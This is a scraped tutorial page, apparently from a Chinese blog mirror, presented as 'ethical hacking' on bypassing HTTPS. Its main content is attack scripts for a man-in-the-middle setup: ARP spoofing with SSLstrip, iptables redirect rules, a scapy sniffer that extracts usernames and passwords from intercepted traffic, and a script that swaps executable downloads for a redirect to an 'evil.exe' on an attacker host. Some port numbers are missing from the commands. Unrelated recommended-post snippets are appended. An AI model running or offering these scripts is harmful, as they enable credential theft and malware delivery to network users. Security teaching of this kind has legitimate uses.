Python Ethical Hacking - Bypass HTTPS(1)
HTTPS:
Problem:
- Data in HTTP is sent as plain text.
- A MITM can read and edit requests and responses.
-> not secure
Solution:
- Use HTTPS.
- HTTPS is an adaptation of HTTP.
- Encrypt HTTP using TLS(Transport Layer Security) or SSL(Secure Sockets Layer).
ARP Spoofing

ARP Spoofing With SSLStrip

1. Flush route tables and execute the arp_spoof script.
iptables --flush
python3 arp_spoof.py
2. Start the SSLstrip.
sslstrip

3. Execute the following commands to redirect the packets.
iptables -t nat -A PREROUTING -p tcp --destination-port -j REDIRECT --to-port
4. Run the sniff script.
#!/usr/bin/env python import scapy
from scapy.layers.http import HTTPRequest
from scapy.packet import Raw
from scapy.sendrecv import sniff def sniff(interface):
scapy.sendrecv.sniff(iface=interface, store=False, prn=process_sniffed_packet) def get_url(packet):
return packet[HTTPRequest].Host.decode(errors='ignore') + packet[HTTPRequest].Path.decode(errors='ignore') def get_login_info(packet):
if packet.haslayer(Raw):
packet.show()
load = packet[Raw].load
keywords = ["email", "username", "user", "login", "password", "pass", "uid"]
for keyword in keywords:
if keyword in load:
return load def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
url = get_url(packet)
print("[+] HTTP Request >> " + url) login_info = get_login_info(packet)
if login_info:
print("\n\n[+] Possible username/password > " + login_info + "\n\n")
scapy.sendrecv.sniff() sniff("eth0")
5. Browse the target website and find something interesting.

Replacing Downloads on HTTPS Pages:
1.Execute the following commands
iptables --flush iptables -I OUTPUT -j NFQUEUE --queue-num iptables -I INPUT -j NFQUEUE --queue-num iptables -t nat -A PREROUTING -p tcp --destination-port -j REDIRECT --to-port echo > /proc/sys/net/ipv4/ip_forward python3 arp_spoof.py
2. Modify the Python Script and execute
#!/usr/bin/env python from netfilterqueue import NetfilterQueue
from scapy.layers.inet import IP, TCP
from scapy.packet import Raw ack_list = [] def set_load(packet, load):
packet[Raw].load = load
del packet[IP].len
del packet[IP].chksum
del packet[TCP].chksum
return packet def process_packet(packet):
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):
if scapy_packet[TCP].dport == 10000:
if ".exe" in scapy_packet[Raw].load.decode() and "10.0.0.43" not in scapy_packet[Raw].load.decode():
print("[+]EXE Request")
ack_list.append(scapy_packet[TCP].ack)
elif scapy_packet[TCP].sport == 10000:
if scapy_packet[TCP].seq in ack_list:
ack_list.remove(scapy_packet[TCP].seq)
print("[+] Replacing file")
modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.0.43/evil-files/evil.exe\n\n")
packet.set_payload(str(modified_packet).encode()) packet.accept() queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
queue.run()
except KeyboardInterrupt:
print('')
3. Browse the website - https://winzip.com and try to download the executable file.

Python Ethical Hacking - Bypass HTTPS(1)的更多相关文章
- Python Ethical Hacking - Bypass HTTPS(2)
Injecting Code in HTTPS Pages: #!/usr/bin/env python import re from netfilterqueue import NetfilterQ ...
- Python Ethical Hacking - MAC Address & How to Change(1)
MAC ADDRESS Media Access Control Permanent Physical Unique Assigned by manufacturer WHY CHANGE THE M ...
- Python Ethical Hacking - NETWORK_SCANNER(1)
NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...
- Python Ethical Hacking - MAC Address & How to Change(3)
SIMPLE ALGORITHM Goal -> Check if MAC address was changed. Steps: 1. Execute and read ifconfig. ...
- Python Ethical Hacking - The Lab and Needed Software
The Lab and Needed Software Attacker Machine - Kali Linux https://www.kali.org/ 1. Install the softw ...
- Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(2)
MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...
- Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(1)
MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...
- Python Ethical Hacking - DNS Spoofing
What is DNS Spoofing Sniff the DNSRR packet and show on the terminal. #!/usr/bin/env python from net ...
- Python Ethical Hacking - Intercepting and Modifying Packets
INTERCEPTING & MODIFYING PACKETS Scapy can be used to: Create packets. Analyze packets. Send/rec ...
随机推荐
- 宝塔面板搭载yii2.0项目关于open_basedir报错解决办法
昨天配置完宝塔的lamp后,然后把原本的yii项目放上去,发现出现三个报错,就是大概 require openssl之类的三个错误 然后去宝塔的界面里去配置了一个端口,然后再去阿里云上开放这个端口 ...
- Ubuntu搭建Java开发环境-刘志敏-专题视频课程
Ubuntu搭建Java开发环境-3人已学习 课程介绍 主要介绍在Ubuntu环境如何安装Java开发的基本环境课程收益 学会Ubuntu中安装jdk.mysql.maven和id ...
- 慕课网--docker走进第一个javaweb应用
zh docker镜像就是一系列文件的集合 docker 容器就是一个进程.将docker镜像运行起来就是一个docker容器 docker仓库就是存储docker镜像的 1.docker的安装 do ...
- 四层发现-UDP发现
udp发现要注意选择一个不常用的端口,如果目标ip在up时目标端口是开放状态,那么不管目标ip是否为up状态,都不会收到任何回应,只有在目标ip为down状态且目标端口为关闭状态,才会返回一个目标不可 ...
- xdebug调试代码常用操作
xdebug调试代码常用操作 1.查看变量中的值 2.常用快捷键 ①F8单步调试 ②F9可以直接快速结束调试 ③F7 可以进入调试代码的底层方法,我觉得查看底层代码时,这个特别的方便!
- 用Creator实现一个擀面的效果
先上几张效果图 怎么实现的呢? 节点介绍 1是背景图,可以忽略:2 是准备好的面团:3 是擀好的面饼先隐藏:4 是需要绘制的节点:5 是擀面杖. 制作开始 首先在view上挂一个mask,并且设置为模 ...
- 分享 HT 实用技巧:实现指南针和 3D 魔方导航
前言 三维场景时常需要一个导航标识,用来确定场景所处的方位. 一般有两种表现形式:指南针.小方盒(方位魔方). 参考一下百度百科中的 maya 界面,可以看到右上角有一个标识方位的小盒子,说的就是它: ...
- 多图解释Redis的整数集合intset升级过程
redis源码分析系列文章 [Redis源码系列]在Liunx安装和常见API 为什么要从Redis源码分析 String底层实现——动态字符串SDS 双向链表都不懂,还说懂Redis? 面试官:说说 ...
- AJAX 调用WebService 、WebApi 增删改查(笔记)
经过大半天努力,终于完成增删改查了!心情有点小激动!!对于初学者的我来说,一路上都是迷茫,坑!!虽说网上有资料,可动手起来却不易(初学者的我).(苦逼啊!) WebService 页面: /// &l ...
- P2136 拉近距离
我也想有这样的爱情故事,可惜我单身 其实这道题就是一个比较裸的最短路问题.对于一个三元组 (S,W,T) ,S其实就是一个端点,而W就是到达的端点,连接两个端点的边长为-T,注意要取一个相反数,这样才 ...